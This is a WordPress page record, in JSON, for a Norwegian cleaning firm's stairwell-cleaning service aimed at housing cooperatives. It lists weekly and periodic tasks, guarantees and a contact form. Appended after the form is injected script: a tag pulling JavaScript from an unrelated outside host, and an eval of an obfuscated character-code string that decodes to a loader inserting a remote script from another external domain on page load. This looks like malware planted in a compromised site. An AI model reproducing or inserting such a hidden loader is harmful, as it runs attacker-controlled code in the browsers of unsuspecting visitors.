{"id":3867,"date":"2020-11-05T19:20:19","date_gmt":"2020-11-05T19:20:19","guid":{"rendered":"http:\/\/ms24.no\/?page_id=3867"},"modified":"2021-04-13T18:57:16","modified_gmt":"2021-04-13T16:57:16","slug":"trappevask","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=3867","title":{"rendered":"Trappevask"},"content":{"rendered":"<h2>\n\t\t\t\t\t\tTrappevask i Oslo og Viken\t\t\t\t\t<\/h2>\n<p>\t\t\t\t\t\tVi er en fleksibel og godt etablert bedrift som tilbyr en rekke profesjonelle tjenester innen vask og renhold, blant annet trappevask. Borettslag er en av v\u00e5re spesialiteter, og vi utf\u00f8rer ogs\u00e5 tjenestene v\u00e5re hos privatpersoner og bedrifter, med en garanti p\u00e5 kvalitet og punktlighet i alt vi gj\u00f8r. V\u00e5r rengj\u00f8ringsstab best\u00e5r av godt kvalifiserte mennesker som er b\u00e5de kvalitets- og l\u00f8sningsorienterte, og de gj\u00f8r jobben effektivt og riktig. Vi utf\u00f8rer trappevask i Bergen og omegn, og ingen jobb er for stor eller for liten for oss. V\u00e5rt team med positive mennesker arbeider effektiv og systematisk, og vi sikrer kvalitet gjennom gode rutiner, god kommunikasjon og ikke minst tilpasningsdyktighet.<br \/>\n\t\t\t\t\t<a href=\"https:\/\/ms24.no\/booking\/index_one_step.php\"><br \/>\n\t\t\t\t\t\tFinn din pris\t\t\t\t\t<\/a><\/p>\n<h2>Trappevask Borettslag<\/h2>\n<p>Trappevasken er ofte et potensielt omr\u00e5de for konflikter og uenigheter i sameier og borettslag, og \u00e5 engasjere profesjonelle til dette kan spare nabolaget for mye bry. I tillegg kan man kan v\u00e6re sikker p\u00e5 at jobben vil bli gjort like godt hver gang.<br \/>\nBeboere i et borettslag er ikke alltid like tilgjengelige, eller i noen tilfeller er medlemmer gjerne pensjonerte og m\u00e5 be familie og venner om \u00e5 gj\u00f8re slike jobber for seg. Ved \u00e5 benytte oss, kan du gj\u00f8re alt dette mye enklere. \u00c5 komme hjem til rene ganger og trapper, og \u00e5 vite at dette er tatt h\u00e5nd om av profesjonelle gir trivsel og ro, slik at du heller kan bruke tiden p\u00e5 andre, viktigere ting.<br \/>\nMed oss kan du gi alle dine bes\u00f8kende et godt inntrykk av ditt bosted n\u00e5r de ser at renholdet blir gjort ordentlig.<\/p>\n<h3>Ukentlig renhold<\/h3>\n<ul>\n<li>Vask av trapper og avsatser fra og med \u00f8verste etasje til og med kjellerniv\u00e5 med fuktig mopp.<\/li>\n<li>Skifte mopp etter behov.<\/li>\n<li>Fjerne flekker, tyggegummi og annet i trappene og avsatser.<\/li>\n<li>Gelendere \u00f8vre l\u00f8p vaskes med fuktig klut.<\/li>\n<li>Riste matte ved utgangsd\u00f8r.<\/li>\n<li>Vinduer p\u00e5 og ved siden av utgangsd\u00f8r vaskes med egen vindusklut.<\/li>\n<li>Postkasseanlegg t\u00f8rkes av med fuktig klut.<\/li>\n<\/ul>\n<h3>Periodisk renhold<\/h3>\n<ul>\n<li>Hovedrengj\u00f8ring av oppgangen<\/li>\n<li>Vask av fellesvaskeriet<\/li>\n<li>Vask av styrerom og fellesarealer<\/li>\n<li>Matteservice<\/li>\n<li>Fjerne flekker p\u00e5 vegg<\/li>\n<li>Vaske nedre l\u00f8p gelender<\/li>\n<li>sidevanger. Vaske lister, sikringsskap<\/li>\n<li>Skuring og boning<\/li>\n<\/ul>\n<p>\t\t\t\t<a href=\"https:\/\/ms24.no\/kontakt\/\"><br \/>\n\t\t\t\t\t\t\t\t<\/a><\/p>\n<h3>\n\t\t\t\t\t<a href=\"https:\/\/ms24.no\/kontakt\/\">Kontakt oss<\/a><br \/>\n\t\t\t\t<\/h3>\n<p>Avtal gratis befaring i dag<\/p>\n<h3>\n\t\t\t\t\tTryggehetsgaranti<br \/>\n\t\t\t\t<\/h3>\n<p>\u00e5re interne kontrollrutiner sikrer kontroll av utf\u00f8rt arbeid gjennom v\u00e5re inspekt\u00f8rer. Dette gir dere som kunde en trygghet for utf\u00f8rt arbeid.<\/p>\n<h3>\n\t\t\t\t\tKvalitetsgaranti<br \/>\n\t\t\t\t<\/h3>\n<p>Vi garanterer at alle tjenester utf\u00f8rt av Milj\u00f8 Solutions AS holder normal god bransjestandard. Om dette ikke er tilfelle reduserer vi regningen for de tjenester dere ikke er forn\u00f8yd med.<\/p>\n<h2>VI HAR F\u00d8LGENDE SERTIFISERINGER<\/h2>\n<p>\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"280\" height=\"210\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"154\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"300\" height=\"193\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" loading=\"lazy\" \/><br \/>\n\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"187\" height=\"95\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsfirma-oslo_orig.jpg\" alt=\"\" loading=\"lazy\" \/>\t\t\t\t\t\t\t<\/p>\n<h2>Kontakt oss for Trappevask<\/h2>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f1303-o1\" lang=\"en-US\" dir=\"ltr\" data-wpcf7-id=\"1303\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F3867#wpcf7-f1303-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"1303\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f1303-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<div class=\"online-form\">\n\t<div class=\"row gutters-10\">\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"username\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Navn*\" value=\"\" type=\"text\" name=\"username\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"phone\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Telefon*\" value=\"\" type=\"text\" name=\"phone\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"E- postl*\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"menu-922\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required select2\" aria-required=\"true\" aria-invalid=\"false\" name=\"menu-922\"><option value=\"Velg tjenester\">Velg tjenester<\/option><option value=\"Bedriftsrenhold\">Bedriftsrenhold<\/option><option value=\"Privatrenhold\">Privatrenhold<\/option><option value=\"Vaktmestertjenester\">Vaktmestertjenester<\/option><option value=\"Bygg renhold\">Bygg renhold<\/option><option value=\"Boretslag \/ sameie\">Boretslag \/ sameie<\/option><\/select><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group mg-b-20\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"textarea-652\"><textarea cols=\"40\" rows=\"7\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea form-control\" aria-invalid=\"false\" placeholder=\"Melding . . .\" name=\"textarea-652\"><\/textarea><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group online-button\">\n\t\t\t<p><button type=\"submit\" class=\"wpcf7-submit send-button\">Send<i class=\"fa fa-angle-right\" aria-hidden=\"true\"><\/i><\/button>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 response\">\n\t\t<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>\n<\/form>\n<\/div>\n\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trappevask i Oslo og Viken Vi er en fleksibel og godt etablert bedrift som tilbyr en rekke profesjonelle tjenester innen vask og renhold, blant annet trappevask. Borettslag er en av v\u00e5re spesialiteter, og vi utf\u00f8rer ogs\u00e5 tjenestene v\u00e5re hos privatpersoner og bedrifter, med en garanti p\u00e5 kvalitet og punktlighet i alt vi gj\u00f8r. V\u00e5r rengj\u00f8ringsstab [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-3867","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3867","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3867"}],"version-history":[{"count":132,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3867\/revisions"}],"predecessor-version":[{"id":5783,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3867\/revisions\/5783"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3867"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}